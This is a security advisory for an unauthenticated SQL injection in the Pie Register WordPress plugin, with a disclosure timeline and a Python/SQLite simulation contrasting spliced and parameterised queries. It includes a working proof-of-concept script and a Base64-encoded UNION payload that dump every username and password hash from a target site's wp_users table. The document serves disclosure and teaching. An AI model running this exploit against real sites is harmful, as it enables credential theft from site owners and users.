Pie Register 2.0.14-2.0.15, SQL Injection

User input is not validated when an Invitation Code is accepted, so an SQL injection attack is possible. The flaw is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ (sic, the plugin's own spelling) are supplied to any page, by any user, authenticated or not. The value of ‘invitaion_code’ is Base64-decoded and then concatenated into the SQL query without a prepared statement, so an attacker can UNION an arbitrary query onto it, as the PoC below shows.
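The following is an added, self-contained simulation of the flaw and its fix; it is not Pie Register's code. The lookup is modelled in Python against an in-memory SQLite database with constructed sample rows. The query template `code = ('...')` is an assumption inferred from the leading `')` of the PoC payload, and the payload is translated from MySQL to SQLite syntax (`group_concat(a || ',' || b)` for `GROUP_CONCAT(CONCAT_WS(...))`, `--` for `#`) so that it runs here. The vulnerable function splices the decoded value into the SQL text; the hardened function binds it as a parameter, which is what the plugin should have done with `$wpdb->prepare()`.

```python
import base64
import sqlite3

# Constructed sample data standing in for the WordPress database (not real credentials).
SCHEMA = """
CREATE TABLE invitations (id INTEGER PRIMARY KEY, code TEXT NOT NULL, used INTEGER NOT NULL);
INSERT INTO invitations (code, used) VALUES ('ABC123', 0);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users (user_login, user_pass) VALUES ('admin', '$P$Bhash1'), ('editor', '$P$Bhash2');
"""

# A legitimate Base64-encoded invitation code, as the plugin expects to receive it.
LEGIT_B64 = base64.b64encode(b"ABC123").decode()

# The advisory's UNION payload, adapted from MySQL to SQLite syntax for this simulation:
# group_concat(a || ',' || b) replaces GROUP_CONCAT(CONCAT_WS(...)) and '--' replaces '#'.
PAYLOAD_SQL = ("') UNION SELECT (SELECT group_concat(user_login || ',' || user_pass) "
               "FROM wp_users),2 --")
PAYLOAD_B64 = base64.b64encode(PAYLOAD_SQL.encode()).decode()


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, invitaion_code_b64):
    """Assumed shape of the flawed lookup: Base64-decode, then splice into the SQL text.

    The template `code = ('...')` is an assumption inferred from the payload's leading `')`.
    """
    code = base64.b64decode(invitaion_code_b64).decode()
    sql = "SELECT id, used FROM invitations WHERE code = ('%s')" % code
    return conn.execute(sql).fetchall()


def safe_lookup(conn, invitaion_code_b64):
    """Hardened form: the decoded value is bound as a parameter and never parsed as SQL."""
    code = base64.b64decode(invitaion_code_b64).decode()
    sql = "SELECT id, used FROM invitations WHERE code = ?"
    return conn.execute(sql, (code,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, legit code :", vulnerable_lookup(db, LEGIT_B64))
    print("vulnerable, payload    :", vulnerable_lookup(db, PAYLOAD_B64))
    print("prepared,   legit code :", safe_lookup(db, LEGIT_B64))
    print("prepared,   payload    :", safe_lookup(db, PAYLOAD_B64))
```

With the legitimate code both functions return the matching invitation row. With the payload, the spliced query's first SELECT matches nothing and the UNION branch returns one row whose first column is the concatenated `user_login,user_pass` pairs of every user, which is exactly what the PoC extracts from the rendered page; the parameterised query simply finds no invitation whose code equals the payload string.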



CVSS Score


CVSS Vector


Attack Scope


Authorization Required



Uninstall the plugin – or patch manually

Proof of Concept

The PoC below prints the username and password hash of every row in the wp_users table of the site's database.

import base64, re, sys
import requests

# Site root of the target WordPress install, passed as the first argument
# (the original script left `url` undefined).
url = sys.argv[1]

# Close the quoted value, UNION in a dump of wp_users, and comment out the rest of the query.
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query.encode()).decode()

# Both parameters must be present; 'invitaion_code' (sic) is the plugin's own spelling.
# The value given to 'show_dash_widget' is assumed; the advisory only requires it to be set.
params = {"show_dash_widget": "1", "invitaion_code": query_encoded}
r = requests.get(url, params=params)

# The UNIONed row is rendered into a table cell; pull the concatenated login,hash list out of it.
print(re.search(r"<tr><td>([^<]*?)<", r.text).group(1))


~$ python g0blin-00040.py <target-url>


  • 2015-03-16: Discovered
  • 2015-03-16: Vendor notified
  • 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
  • 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
  • 2015-04-13: Update requested from Vendor
  • 2015-04-20: Update requested from Vendor
  • 2015-04-20: Vendor states new version
  • 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
  • 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
  • 2015-05-04: Advisory released: